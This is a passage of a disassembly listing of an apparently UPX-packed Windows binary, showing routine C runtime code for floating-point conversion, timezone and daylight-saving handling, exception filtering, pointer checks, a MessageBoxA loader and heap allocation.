push dword ptr [edi+8] lea eax, [ebp+var_C] push eax call sub_424225 add esp, 10h test eax, eax jz short loc_42440E inc ebx loc_42440E: ; CODE XREF: sub_424380+8Bj mov eax, [edi+4] mov ecx, eax sub ecx, [edi+8] cmp ebx, ecx jge short loc_424426 lea eax, [ebp+var_C] push eax call sub_4242CC pop ecx jmp short loc_424462 ; --------------------------------------------------------------------------- loc_424426: ; CODE XREF: sub_424380+98j cmp ebx, eax jg short loc_424469 sub eax, ebx mov esi, eax lea eax, [ebp+var_18] push eax lea eax, [ebp+var_C] push eax call sub_4242B1 lea eax, [ebp+var_C] push esi push eax call sub_4242F3 push dword ptr [edi+8] lea eax, [ebp+var_C] push eax call sub_424225 mov eax, [edi+0Ch] inc eax push eax lea eax, [ebp+var_C] push eax call sub_4242F3 add esp, 20h loc_424462: ; CODE XREF: sub_424380+A4j xor esi, esi jmp loc_4243E5 ; --------------------------------------------------------------------------- loc_424469: ; CODE XREF: sub_424380+A8j cmp ebx, [edi] jl short loc_424495 lea eax, [ebp+var_C] push eax call sub_4242CC push dword ptr [edi+0Ch] or byte ptr [ebp+var_C+3], 80h lea eax, [ebp+var_C] push eax call sub_4242F3 mov esi, [edi+14h] add esp, 0Ch add esi, [edi] push 1 jmp loc_4243E7 ; --------------------------------------------------------------------------- loc_424495: ; CODE XREF: sub_424380+EBj push dword ptr [edi+0Ch] mov esi, [edi+14h] and byte ptr [ebp+var_C+3], 7Fh lea eax, [ebp+var_C] push eax add esi, ebx call sub_4242F3 pop ecx pop ecx loc_4244AC: ; CODE XREF: sub_424380+55j xor eax, eax loc_4244AE: ; CODE XREF: sub_424380+68j push 1Fh pop ecx sub ecx, [edi+0Ch] mov edi, [edi+10h] shl esi, cl mov ecx, [ebp+arg_0] neg ecx sbb ecx, ecx and ecx, 80000000h or esi, ecx or esi, [ebp+var_C] cmp edi, 40h jnz short loc_4244DD mov ecx, [ebp+arg_4] mov edx, [ebp+var_8] mov [ecx+4], esi mov [ecx], edx jmp short loc_4244E7 ; --------------------------------------------------------------------------- loc_4244DD: ; CODE XREF: sub_424380+14Ej cmp edi, 20h jnz short loc_4244E7 mov ecx, [ebp+arg_4] mov [ecx], esi loc_4244E7: ; CODE XREF: sub_424380+15Bj ; sub_424380+160j pop edi pop esi pop ebx leave retn sub_424380 endp ; =============== S U B R O U T I N E ======================================= sub_4244EC proc near ; CODE XREF: sub_424518+23p arg_0 = dword ptr 4 arg_4 = dword ptr 8 push offset dword_43D358 push [esp+4+arg_4] push [esp+8+arg_0] call sub_424380 add esp, 0Ch retn sub_4244EC endp ; =============== S U B R O U T I N E ======================================= sub_424502 proc near ; CODE XREF: sub_424545+23p arg_0 = dword ptr 4 arg_4 = dword ptr 8 push offset dword_43D370 push [esp+4+arg_4] push [esp+8+arg_0] call sub_424380 add esp, 0Ch retn sub_424502 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_424518 proc near ; CODE XREF: sub_42199B+12p var_C = byte ptr -0Ch arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 0Ch xor eax, eax push eax push eax push eax push eax push [ebp+arg_4] lea eax, [ebp+arg_4] push eax lea eax, [ebp+var_C] push eax call sub_4251F1 push [ebp+arg_0] lea eax, [ebp+var_C] push eax call sub_4244EC add esp, 24h leave retn sub_424518 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_424545 proc near ; CODE XREF: sub_42199B+2Dp var_C = byte ptr -0Ch arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 0Ch xor eax, eax push eax push eax push eax push eax push [ebp+arg_4] lea eax, [ebp+arg_4] push eax lea eax, [ebp+var_C] push eax call sub_4251F1 push [ebp+arg_0] lea eax, [ebp+var_C] push eax call sub_424502 add esp, 24h leave retn sub_424545 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_424572 proc near ; CODE XREF: sub_4219D9+65p ; sub_421ADD+63p ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp mov edx, [ebp+arg_8] push ebx mov ebx, [ebp+arg_4] push esi mov esi, [ebp+arg_0] mov ecx, [edx+0Ch] push edi lea edi, [esi+1] mov byte ptr [esi], 30h test ebx, ebx mov eax, edi jle short loc_4245AF mov [ebp+arg_0], ebx xor ebx, ebx loc_424595: ; CODE XREF: sub_424572+38j mov dl, [ecx] test dl, dl jz short loc_4245A1 movsx edx, dl inc ecx jmp short loc_4245A4 ; --------------------------------------------------------------------------- loc_4245A1: ; CODE XREF: sub_424572+27j push 30h pop edx loc_4245A4: ; CODE XREF: sub_424572+2Dj mov [eax], dl inc eax dec [ebp+arg_0] jnz short loc_424595 mov edx, [ebp+arg_8] loc_4245AF: ; CODE XREF: sub_424572+1Cj and byte ptr [eax], 0 test ebx, ebx jl short loc_4245C8 cmp byte ptr [ecx], 35h jl short loc_4245C8 loc_4245BB: ; CODE XREF: sub_424572+52j dec eax cmp byte ptr [eax], 39h jnz short loc_4245C6 mov byte ptr [eax], 30h jmp short loc_4245BB ; --------------------------------------------------------------------------- loc_4245C6: ; CODE XREF: sub_424572+4Dj inc byte ptr [eax] loc_4245C8: ; CODE XREF: sub_424572+42j ; sub_424572+47j cmp byte ptr [esi], 31h jnz short loc_4245D2 inc dword ptr [edx+4] jmp short loc_4245E4 ; --------------------------------------------------------------------------- loc_4245D2: ; CODE XREF: sub_424572+59j push edi call sub_41AFE0 inc eax push eax push edi push esi call sub_41CC90 add esp, 10h loc_4245E4: ; CODE XREF: sub_424572+5Ej pop edi pop esi pop ebx pop ebp retn sub_424572 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4245E9 proc near ; CODE XREF: sub_4219D9+3Fp ; sub_421ADD+46p ... var_C = byte ptr -0Ch arg_0 = byte ptr 8 push ebp mov ebp, esp sub esp, 0Ch push esi lea eax, [ebp+arg_0] push edi push eax lea eax, [ebp+var_C] push eax call sub_42464D pop ecx lea esi, [ebp+var_C] pop ecx push offset word_4DBB50 push 0 push 11h sub esp, 0Ch mov edi, esp movsd movsd movsw call sub_4256C2 mov ds:dword_4DBB78, eax add esp, 18h movsx eax, ds:byte_4DBB52 mov ds:dword_4DBB70, eax pop edi movsx eax, ds:word_4DBB50 mov ds:dword_4DBB74, eax mov ds:dword_4DBB7C, offset dword_4DBB54 mov eax, offset dword_4DBB70 pop esi leave retn sub_4245E9 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_42464D proc near ; CODE XREF: sub_4245E9+10p var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ecx mov edx, [ebp+arg_4] push ebx push esi push edi mov ax, [edx+6] mov edi, 7FFh mov ecx, eax and eax, 8000h shr ecx, 4 and ecx, edi mov [ebp+arg_4], eax mov eax, [edx+4] mov edx, [edx] movzx ebx, cx mov esi, 80000000h and eax, 0FFFFFh test ebx, ebx mov [ebp+var_4], esi jz short loc_42469B cmp ebx, edi jz short loc_424694 lea edi, [ecx+3C00h] jmp short loc_4246BC ; --------------------------------------------------------------------------- loc_424694: ; CODE XREF: sub_42464D+3Dj mov edi, 7FFFh jmp short loc_4246BC ; --------------------------------------------------------------------------- loc_42469B: ; CODE XREF: sub_42464D+39j xor ebx, ebx cmp eax, ebx jnz short loc_4246B3 cmp edx, ebx jnz short loc_4246B3 mov eax, [ebp+arg_0] mov [eax+4], ebx mov [eax], ebx mov [eax+8], bx jmp short loc_4246FE ; --------------------------------------------------------------------------- loc_4246B3: ; CODE XREF: sub_42464D+52j ; sub_42464D+56j lea edi, [ecx+3C01h] mov [ebp+var_4], ebx loc_4246BC: ; CODE XREF: sub_42464D+45j ; sub_42464D+4Cj mov ecx, edx shr ecx, 15h shl eax, 0Bh or ecx, eax mov eax, [ebp+arg_0] or ecx, [ebp+var_4] shl edx, 0Bh mov [eax+4], ecx mov [eax], edx loc_4246D4: ; CODE XREF: sub_42464D+A6j test ecx, esi jnz short loc_4246F5 mov edx, [eax] add ecx, ecx mov ebx, edx shr ebx, 1Fh or ebx, ecx lea ecx, [edx+edx] mov [eax], ecx mov [eax+4], ebx add edi, 0FFFFh mov ecx, ebx jmp short loc_4246D4 ; --------------------------------------------------------------------------- loc_4246F5: ; CODE XREF: sub_42464D+89j mov ecx, [ebp+arg_4] or ecx, edi mov [eax+8], cx loc_4246FE: ; CODE XREF: sub_42464D+64j pop edi pop esi pop ebx leave retn sub_42464D endp ; --------------------------------------------------------------------------- push 2 call sub_41DA29 pop ecx retn ; =============== S U B R O U T I N E ======================================= sub_42470C proc near ; DATA XREF: sub_424752o ; UPX0:0043CF98o ... arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] mov eax, [esi] cmp dword ptr [eax], 0E06D7363h jnz short loc_42472F cmp dword ptr [eax+10h], 3 jnz short loc_42472F cmp dword ptr [eax+14h], 19930520h jnz short loc_42472F jmp sub_42255C ; --------------------------------------------------------------------------- loc_42472F: ; CODE XREF: sub_42470C+Dj ; sub_42470C+13j ... mov eax, ds:dword_4DBB80 test eax, eax jz short loc_42474C push eax call sub_4247A8 test eax, eax pop ecx jz short loc_42474C push esi call ds:dword_4DBB80 jmp short loc_42474E ; --------------------------------------------------------------------------- loc_42474C: ; CODE XREF: sub_42470C+2Aj ; sub_42470C+35j xor eax, eax loc_42474E: ; CODE XREF: sub_42470C+3Ej pop esi retn 4 sub_42470C endp ; =============== S U B R O U T I N E ======================================= sub_424752 proc near ; DATA XREF: UPX0:00429028o push offset sub_42470C call dword_42701C ; SetUnhandledExceptionFilter mov ds:dword_4DBB80, eax retn sub_424752 endp ; =============== S U B R O U T I N E ======================================= sub_424763 proc near ; DATA XREF: UPX0:00429040o push ds:dword_4DBB80 call dword_42701C ; SetUnhandledExceptionFilter retn sub_424763 endp ; =============== S U B R O U T I N E ======================================= sub_424770 proc near ; CODE XREF: sub_421DB1+6Bp ; sub_4222C2+61p ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 push esi push 1 pop esi push [esp+4+arg_4] push [esp+8+arg_0] call dword_427018 ; IsBadReadPtr test eax, eax jz short loc_424788 xor esi, esi loc_424788: ; CODE XREF: sub_424770+14j mov eax, esi pop esi retn sub_424770 endp ; =============== S U B R O U T I N E ======================================= sub_42478C proc near ; CODE XREF: sub_4222C2+73p ; sub_4222C2+BFp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 push esi push 1 pop esi push [esp+4+arg_4] push [esp+8+arg_0] call dword_4271C8 ; IsBadWritePtr test eax, eax jz short loc_4247A4 xor esi, esi loc_4247A4: ; CODE XREF: sub_42478C+14j mov eax, esi pop esi retn sub_42478C endp ; =============== S U B R O U T I N E ======================================= sub_4247A8 proc near ; CODE XREF: sub_4222C2+15Bp ; sub_42470C+2Dp arg_0 = dword ptr 4 push esi push 1 pop esi push [esp+4+arg_0] call dword_427014 ; IsBadCodePtr test eax, eax jz short loc_4247BC xor esi, esi loc_4247BC: ; CODE XREF: sub_4247A8+10j mov eax, esi pop esi retn sub_4247A8 endp ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_42255C loc_4247C0: ; CODE XREF: sub_42255C:loc_4225ADj push 0Ah call sub_4235C9 push 16h call sub_425955 pop ecx pop ecx push 3 call sub_41B7C2 ; END OF FUNCTION CHUNK FOR sub_42255C ; =============== S U B R O U T I N E ======================================= sub_4247D7 proc near ; CODE XREF: sub_422669:loc_4226A8p cmp ds:dword_4DBC40, 0 jnz short locret_4247EB call sub_4247EC inc ds:dword_4DBC40 locret_4247EB: ; CODE XREF: sub_4247D7+7j retn sub_4247D7 endp ; =============== S U B R O U T I N E ======================================= sub_4247EC proc near ; CODE XREF: sub_4247D7+9p var_4 = dword ptr -4 push ecx push ebx push ebp push esi push edi xor ebp, ebp or ebx, 0FFFFFFFFh push offset aTz ; "TZ" xor edi, edi mov ds:dword_4DBB88, ebp mov dword_43D430, ebx mov dword_43D420, ebx call sub_425AC7 mov esi, eax pop ecx cmp esi, ebp jnz loc_424915 push offset dword_4DBB90 call dword_4271A0 ; GetTimeZoneInformation cmp eax, ebx jz loc_424A44 mov eax, ds:dword_4DBB90 mov ecx, ds:dword_4DBBE4 imul eax, 3Ch cmp ds:word_4DBBD6, bp push 1 pop edx mov dword_43D388, eax mov ds:dword_4DBB88, edx jz short loc_424863 mov esi, ecx imul esi, 3Ch add eax, esi mov dword_43D388, eax loc_424863: ; CODE XREF: sub_4247EC+69j cmp ds:word_4DBC2A, bp jz short loc_424887 mov eax, ds:dword_4DBC38 cmp eax, ebp jz short loc_424887 sub eax, ecx mov dword_43D38C, edx imul eax, 3Ch mov dword_43D390, eax jmp short loc_424893 ; --------------------------------------------------------------------------- loc_424887: ; CODE XREF: sub_4247EC+7Ej ; sub_4247EC+87j mov dword_43D38C, ebp mov dword_43D390, ebp loc_424893: ; CODE XREF: sub_4247EC+99j lea eax, [esp+14h+var_4] mov esi, dword_42717C push eax push ebp push 3Fh mov edi, 220h push off_43D414 push ebx push offset dword_4DBB94 push edi push ds:dword_4DBA24 call esi ; WideCharToMultiByte test eax, eax jz short loc_4248D0 cmp [esp+14h+var_4], ebp jnz short loc_4248D0 mov eax, off_43D414 and byte ptr [eax+3Fh], 0 jmp short loc_4248D8 ; --------------------------------------------------------------------------- loc_4248D0: ; CODE XREF: sub_4247EC+D1j ; sub_4247EC+D7j mov eax, off_43D414 and byte ptr [eax], 0 loc_4248D8: ; CODE XREF: sub_4247EC+E2j lea eax, [esp+14h+var_4] push eax push ebp push 3Fh push off_43D418 push ebx push offset dword_4DBBE8 push edi push ds:dword_4DBA24 call esi ; WideCharToMultiByte test eax, eax jz loc_424A3C cmp [esp+14h+var_4], ebp jnz loc_424A3C mov eax, off_43D418 and byte ptr [eax+3Fh], 0 jmp loc_424A44 ; --------------------------------------------------------------------------- loc_424915: ; CODE XREF: sub_4247EC+2Dj cmp byte ptr [esi], 0 jz loc_424A44 mov eax, ds:dword_4DBC3C cmp eax, ebp jz short loc_424938 push eax push esi call sub_41C070 pop ecx test eax, eax pop ecx jz loc_424A44 loc_424938: ; CODE XREF: sub_4247EC+139j push ds:dword_4DBC3C call sub_41B0B1 push esi call sub_41AFE0 inc eax push eax call sub_41B4D5 add esp, 0Ch cmp eax, ebp mov ds:dword_4DBC3C, eax jz loc_424A44 push esi push eax call sub_41BEB0 push 3 push esi push off_43D414 call sub_41B5F0 mov eax, off_43D414 add esi, 3 add esp, 14h and byte ptr [eax+3], 0 cmp byte ptr [esi], 2Dh jnz short loc_42498D push 1 inc esi pop edi loc_42498D: ; CODE XREF: sub_4247EC+19Bj push esi call sub_41B6EE pop ecx mov bl, 30h mov ecx, eax imul ecx, 0E10h mov dword_43D388, ecx loc_4249A4: ; CODE XREF: sub_4247EC+1C7j mov al, [esi] cmp al, 2Bh jz short loc_4249B2 cmp al, bl jl short loc_4249B5 cmp al, 39h jg short loc_4249B5 loc_4249B2: ; CODE XREF: sub_4247EC+1BCj inc esi jmp short loc_4249A4 ; --------------------------------------------------------------------------- loc_4249B5: ; CODE XREF: sub_4247EC+1C0j ; sub_4247EC+1C4j cmp byte ptr [esi], 3Ah jnz short loc_424A08 inc esi push esi call sub_41B6EE imul eax, 3Ch pop ecx mov ecx, dword_43D388 add ecx, eax mov dword_43D388, ecx loc_4249D3: ; CODE XREF: sub_4247EC+1F2j mov al, [esi] cmp al, bl jl short loc_4249E0 cmp al, 39h jg short loc_4249E0 inc esi jmp short loc_4249D3 ; --------------------------------------------------------------------------- loc_4249E0: ; CODE XREF: sub_4247EC+1EBj ; sub_4247EC+1EFj cmp byte ptr [esi], 3Ah jnz short loc_424A08 inc esi push esi call sub_41B6EE pop ecx mov ecx, dword_43D388 add ecx, eax mov dword_43D388, ecx loc_4249FB: ; CODE XREF: sub_4247EC+21Aj mov al, [esi] cmp al, bl jl short loc_424A08 cmp al, 39h jg short loc_424A08 inc esi jmp short loc_4249FB ; --------------------------------------------------------------------------- loc_424A08: ; CODE XREF: sub_4247EC+1CCj ; sub_4247EC+1F7j ... cmp edi, ebp jz short loc_424A14 neg ecx mov dword_43D388, ecx loc_424A14: ; CODE XREF: sub_4247EC+21Ej movsx eax, byte ptr [esi] cmp eax, ebp mov dword_43D38C, eax jz short loc_424A3C push 3 push esi push off_43D418 call sub_41B5F0 mov eax, off_43D418 add esp, 0Ch and byte ptr [eax+3], 0 jmp short loc_424A44 ; --------------------------------------------------------------------------- loc_424A3C: ; CODE XREF: sub_4247EC+10Bj ; sub_4247EC+115j ... mov eax, off_43D418 and byte ptr [eax], 0 loc_424A44: ; CODE XREF: sub_4247EC+40j ; sub_4247EC+124j ... pop edi pop esi pop ebp pop ebx pop ecx retn sub_4247EC endp ; =============== S U B R O U T I N E ======================================= sub_424A4A proc near ; CODE XREF: sub_422669+A5p arg_0 = dword ptr 4 push ebx push esi push edi xor edi, edi cmp dword_43D38C, edi jnz short loc_424A5E loc_424A57: ; CODE XREF: sub_424A4A+148j ; sub_424A4A+150j ... xor eax, eax jmp loc_424BAA ; --------------------------------------------------------------------------- loc_424A5E: ; CODE XREF: sub_424A4A+Bj mov esi, [esp+0Ch+arg_0] push 1 pop ebx mov eax, [esi+14h] cmp eax, dword_43D420 jnz short loc_424A7C cmp eax, dword_43D430 jz loc_424B7E loc_424A7C: ; CODE XREF: sub_424A4A+24j cmp ds:dword_4DBB88, edi jz loc_424B54 movzx ecx, ds:word_4DBC36 push ecx cmp ds:word_4DBC28, di movzx ecx, ds:word_4DBC34 push ecx movzx ecx, ds:word_4DBC32 push ecx movzx ecx, ds:word_4DBC30 push ecx jnz short loc_424ACE movzx ecx, ds:word_4DBC2C push edi push ecx movzx ecx, ds:word_4DBC2E push ecx movzx ecx, ds:word_4DBC2A push ecx push eax push ebx jmp short loc_424AE2 ; --------------------------------------------------------------------------- loc_424ACE: ; CODE XREF: sub_424A4A+65j movzx ecx, ds:word_4DBC2E push ecx push edi movzx ecx, ds:word_4DBC2A push edi push ecx push eax push edi loc_424AE2: ; CODE XREF: sub_424A4A+82j push ebx call sub_424BF6 movzx eax, ds:word_4DBBE2 add esp, 2Ch cmp ds:word_4DBBD4, di push eax movzx eax, ds:word_4DBBE0 push eax movzx eax, ds:word_4DBBDE push eax movzx eax, ds:word_4DBBDC push eax jnz short loc_424B3C movzx eax, ds:word_4DBBD8 push edi push eax movzx eax, ds:word_4DBBDA push eax movzx eax, ds:word_4DBBD6 push eax push dword ptr [esi+14h] push ebx loc_424B31: ; CODE XREF: sub_424A4A+108j push edi call sub_424BF6 add esp, 2Ch jmp short loc_424B7E ; --------------------------------------------------------------------------- loc_424B3C: ; CODE XREF: sub_424A4A+C8j movzx eax, ds:word_4DBBDA push eax push edi movzx eax, ds:word_4DBBD6 push edi push eax push dword ptr [esi+14h] push edi jmp short loc_424B31 ; --------------------------------------------------------------------------- loc_424B54: ; CODE XREF: sub_424A4A+38j push edi push edi push edi push 2 push edi push edi push ebx push 4 push eax push ebx push ebx call sub_424BF6 push edi push edi push edi push 2 push edi push edi push 5 push 0Ah push dword ptr [esi+14h] push ebx push edi call sub_424BF6 add esp, 58h loc_424B7E: ; CODE XREF: sub_424A4A+2Cj ; sub_424A4A+F0j mov edx, dword_43D424 mov eax, dword_43D434 mov ecx, [esi+1Ch] cmp edx, eax jge short loc_424BAE cmp ecx, edx jl loc_424A57 cmp ecx, eax jg loc_424A57 cmp ecx, edx jle short loc_424BC2 cmp ecx, eax jge short loc_424BC2 loc_424BA8: ; CODE XREF: sub_424A4A+166j ; sub_424A4A+16Aj mov eax, ebx loc_424BAA: ; CODE XREF: sub_424A4A+Fj ; sub_424A4A+19Dj pop edi pop esi pop ebx retn ; --------------------------------------------------------------------------- loc_424BAE: ; CODE XREF: sub_424A4A+144j cmp ecx, eax jl short loc_424BA8 cmp ecx, edx jg short loc_424BA8 cmp ecx, eax jle short loc_424BC2 cmp ecx, edx jl loc_424A57 loc_424BC2: ; CODE XREF: sub_424A4A+158j ; sub_424A4A+15Cj ... mov eax, [esi+8] imul eax, 3Ch add eax, [esi+4] imul eax, 3Ch add eax, [esi] imul eax, 3E8h cmp ecx, edx jnz short loc_424BE9 xor ecx, ecx cmp eax, dword_43D428 setnl cl loc_424BE5: ; CODE XREF: sub_424A4A+1AAj mov eax, ecx jmp short loc_424BAA ; --------------------------------------------------------------------------- loc_424BE9: ; CODE XREF: sub_424A4A+18Ej xor ecx, ecx cmp eax, dword_43D438 setl cl jmp short loc_424BE5 sub_424A4A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_424BF6 proc near ; CODE XREF: sub_424A4A+99p ; sub_424A4A+E8p ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch arg_18 = dword ptr 20h arg_1C = dword ptr 24h arg_20 = dword ptr 28h arg_24 = dword ptr 2Ch arg_28 = dword ptr 30h push ebp mov ebp, esp cmp [ebp+arg_4], 1 push ebx mov ebx, [ebp+arg_8] push esi jnz loc_424C91 mov eax, [ebp+arg_C] mov [ebp+arg_8], ebx and [ebp+arg_8], 3 mov esi, eax jnz short loc_424C21 shl esi, 2 mov eax, dword_43D438[esi] jmp short loc_424C2A ; --------------------------------------------------------------------------- loc_424C21: ; CODE XREF: sub_424BF6+1Ej shl esi, 2 mov eax, dword_43D46C[esi] loc_424C2A: ; CODE XREF: sub_424BF6+29j mov edx, ebx lea ecx, [eax+1] imul edx, 16Dh lea eax, [ebx-1] push edi sar eax, 2 mov edi, ecx push 7 add edi, eax lea eax, [edx+edi-63DBh] pop edi cdq idiv edi mov eax, [ebp+arg_10] pop edi cmp edx, [ebp+arg_14] jg short loc_424C64 imul eax, 7 sub eax, edx add eax, [ebp+arg_14] lea ecx, [ecx+eax-7] jmp short loc_424C6E ; --------------------------------------------------------------------------- loc_424C64: ; CODE XREF: sub_424BF6+5Ej imul eax, 7 sub eax, edx add eax, [ebp+arg_14] add ecx, eax loc_424C6E: ; CODE XREF: sub_424BF6+6Cj cmp [ebp+arg_10], 5 jnz short loc_424CAC cmp [ebp+arg_8], 0 jnz short loc_424C82 mov esi, dword_43D43C[esi] jmp short loc_424C88 ; --------------------------------------------------------------------------- loc_424C82: ; CODE XREF: sub_424BF6+82j mov esi, dword_43D470[esi] loc_424C88: ; CODE XREF: sub_424BF6+8Aj cmp ecx, esi jle short loc_424CAC sub ecx, 7 jmp short loc_424CAC ; --------------------------------------------------------------------------- loc_424C91: ; CODE XREF: sub_424BF6+Cj mov eax, [ebp+arg_C] test bl, 3 jnz short loc_424CA2 mov ecx, dword_43D438[eax*4] jmp short loc_424CA9 ; --------------------------------------------------------------------------- loc_424CA2: ; CODE XREF: sub_424BF6+A1j mov ecx, dword_43D46C[eax*4] loc_424CA9: ; CODE XREF: sub_424BF6+AAj add ecx, [ebp+arg_18] loc_424CAC: ; CODE XREF: sub_424BF6+7Cj ; sub_424BF6+94j ... cmp [ebp+arg_0], 1 jnz short loc_424CDD mov eax, [ebp+arg_1C] mov dword_43D424, ecx imul eax, 3Ch add eax, [ebp+arg_20] mov dword_43D420, ebx imul eax, 3Ch add eax, [ebp+arg_24] imul eax, 3E8h add eax, [ebp+arg_28] mov dword_43D428, eax jmp short loc_424D32 ; --------------------------------------------------------------------------- loc_424CDD: ; CODE XREF: sub_424BF6+BAj mov eax, [ebp+arg_1C] mov dword_43D434, ecx imul eax, 3Ch add eax, [ebp+arg_20] imul eax, 3Ch add eax, dword_43D390 add eax, [ebp+arg_24] imul eax, 3E8h add eax, [ebp+arg_28] mov dword_43D438, eax jns short loc_424D15 add eax, 5265C00h dec ecx mov dword_43D438, eax jmp short loc_424D26 ; --------------------------------------------------------------------------- loc_424D15: ; CODE XREF: sub_424BF6+110j mov edx, 5265C00h cmp eax, edx jl short loc_424D2C sub eax, edx inc ecx mov dword_43D438, eax loc_424D26: ; CODE XREF: sub_424BF6+11Dj mov dword_43D434, ecx loc_424D2C: ; CODE XREF: sub_424BF6+126j mov dword_43D430, ebx loc_424D32: ; CODE XREF: sub_424BF6+E5j pop esi pop ebx pop ebp retn sub_424BF6 endp ; =============== S U B R O U T I N E ======================================= sub_424D36 proc near ; CODE XREF: sub_422E72+2Bp arg_0 = dword ptr 4 push 4 push 0 push [esp+8+arg_0] call sub_424D47 add esp, 0Ch retn sub_424D36 endp ; =============== S U B R O U T I N E ======================================= sub_424D47 proc near ; CODE XREF: sub_424D36+8p arg_0 = byte ptr 4 arg_4 = dword ptr 8 arg_8 = byte ptr 0Ch movzx eax, [esp+arg_0] mov cl, [esp+arg_8] test ds:byte_4DCEC1[eax], cl jnz short loc_424D74 cmp [esp+arg_4], 0 jz short loc_424D6D movzx eax, word_43C9E2[eax*2] and eax, [esp+arg_4] jmp short loc_424D6F ; --------------------------------------------------------------------------- loc_424D6D: ; CODE XREF: sub_424D47+16j xor eax, eax loc_424D6F: ; CODE XREF: sub_424D47+24j test eax, eax jnz short loc_424D74 retn ; --------------------------------------------------------------------------- loc_424D74: ; CODE XREF: sub_424D47+Fj ; sub_424D47+2Aj push 1 pop eax retn sub_424D47 endp ; =============== S U B R O U T I N E ======================================= sub_424D78 proc near ; CODE XREF: sub_4235C9+11Fp arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch push ebx xor ebx, ebx cmp ds:dword_4DBC44, ebx push esi push edi jnz short loc_424DC7 push offset aUser32_dll ; "user32.dll" call dword_4270B8 ; LoadLibraryA mov edi, eax cmp edi, ebx jz short loc_424DFD mov esi, dword_4270BC push offset aMessageboxa ; "MessageBoxA" push edi call esi ; GetProcAddress test eax, eax mov ds:dword_4DBC44, eax jz short loc_424DFD push offset aGetactivewindo ; "GetActiveWindow" push edi call esi ; GetProcAddress push offset aGetlastactivep ; "GetLastActivePopup" push edi mov ds:dword_4DBC48, eax call esi ; GetProcAddress mov ds:dword_4DBC4C, eax loc_424DC7: ; CODE XREF: sub_424D78+Bj mov eax, ds:dword_4DBC48 test eax, eax jz short loc_424DE6 call eax mov ebx, eax test ebx, ebx jz short loc_424DE6 mov eax, ds:dword_4DBC4C test eax, eax jz short loc_424DE6 push ebx call eax mov ebx, eax loc_424DE6: ; CODE XREF: sub_424D78+56j ; sub_424D78+5Ej ... push [esp+0Ch+arg_8] push [esp+10h+arg_4] push [esp+14h+arg_0] push ebx call ds:dword_4DBC44 loc_424DF9: ; CODE XREF: sub_424D78+87j pop edi pop esi pop ebx retn ; --------------------------------------------------------------------------- loc_424DFD: ; CODE XREF: sub_424D78+1Cj ; sub_424D78+33j xor eax, eax jmp short loc_424DF9 sub_424D78 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_424E01 proc near ; CODE XREF: sub_423936+22p ; sub_423936+3Bp arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push esi mov esi, [ebp+arg_0] imul esi, [ebp+arg_4] cmp esi, 0FFFFFFE0h push edi mov [ebp+arg_0], esi ja short loc_424E22 test esi, esi jnz short loc_424E1C push 1 pop esi loc_424E1C: ; CODE XREF: sub_424E01+16j add esi, 0Fh and esi, 0FFFFFFF0h loc_424E22: ; CODE XREF: sub_424E01+12j ; sub_424E01+94j xor edi, edi cmp esi, 0FFFFFFE0h ja short loc_424E81 mov eax, ds:dword_4DCFE8 cmp eax, 3 jnz short loc_424E4D mov eax, [ebp+arg_0] cmp eax, ds:dword_4DCFE0 ja short loc_424E6C push eax call sub_41E1CB mov edi, eax pop ecx test edi, edi jnz short loc_424E97 jmp short loc_424E6C ; --------------------------------------------------------------------------- loc_424E4D: ; CODE XREF: sub_424E01+30j cmp eax, 2 jnz short loc_424E6C cmp esi, dword_43C9D4 ja short loc_424E6C mov eax, esi shr eax, 4 push eax call sub_41EC6E mov edi, eax pop ecx test edi, edi jnz short loc_424EAB loc_424E6C: ; CODE XREF: sub_424E01+3Bj ; sub_424E01+4Aj ... push esi push 8 push ds:dword_4DCFE4 call dword_427144 ; RtlAllocateHeap mov edi, eax test edi, edi jnz short loc_424EA5 loc_424E81: ; CODE XREF: sub_424E01+26j cmp ds:dword_4DB9DC, 0 jz short loc_424EA5 push esi call sub_41F312 test eax, eax pop ecx jz short loc_424EAE jmp short loc_424E22 ; --------------------------------------------------------------------------- loc_424E97: ; CODE XREF: sub_424E01+48j push [ebp+arg_0] loc_424E9A: ; CODE XREF: sub_424E01+ABj push 0 push edi call sub_41B590 add esp, 0Ch loc_424EA5: ; CODE XREF: sub_424E01+7Ej ; sub_424E01+87j mov eax, edi loc_424EA7: ; CODE XREF: sub_424E01+AFj pop edi pop esi pop ebp retn ; --------------------------------------------------------------------------- loc_424EAB: ; CODE XREF: sub_424E01+69j push esi jmp short loc_424E9A ; --------------------------------------------------------------------------- loc_424EAE: ; CODE XREF: sub_424E01+92j xor eax, eax jmp short loc_424EA7 sub_424E01 endp ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_4239DB loc_424EB2: ; CODE XREF: sub_4239DB+Ej push esi push edi push 3 xor edi, edi pop esi cmp ds:dword_4DCC80, esi jle short loc_424F05 loc_424EC1: ; CODE XREF: sub_4239DB+1528j mov eax, ds:dword_4DBC78 mov eax, [eax+esi*4] test eax, eax jz short loc_424EFC test byte ptr [eax+0Ch], 83h jz short loc_424EE0 push eax call sub_41B05B cmp eax, 0FFFFFFFFh pop ecx jz short loc_424EE0 inc edi loc_424EE0: ; CODE XREF: sub_4239DB+14F6j ; sub_4239DB+1502j cmp esi, 14h jl short loc_424EFC mov eax, 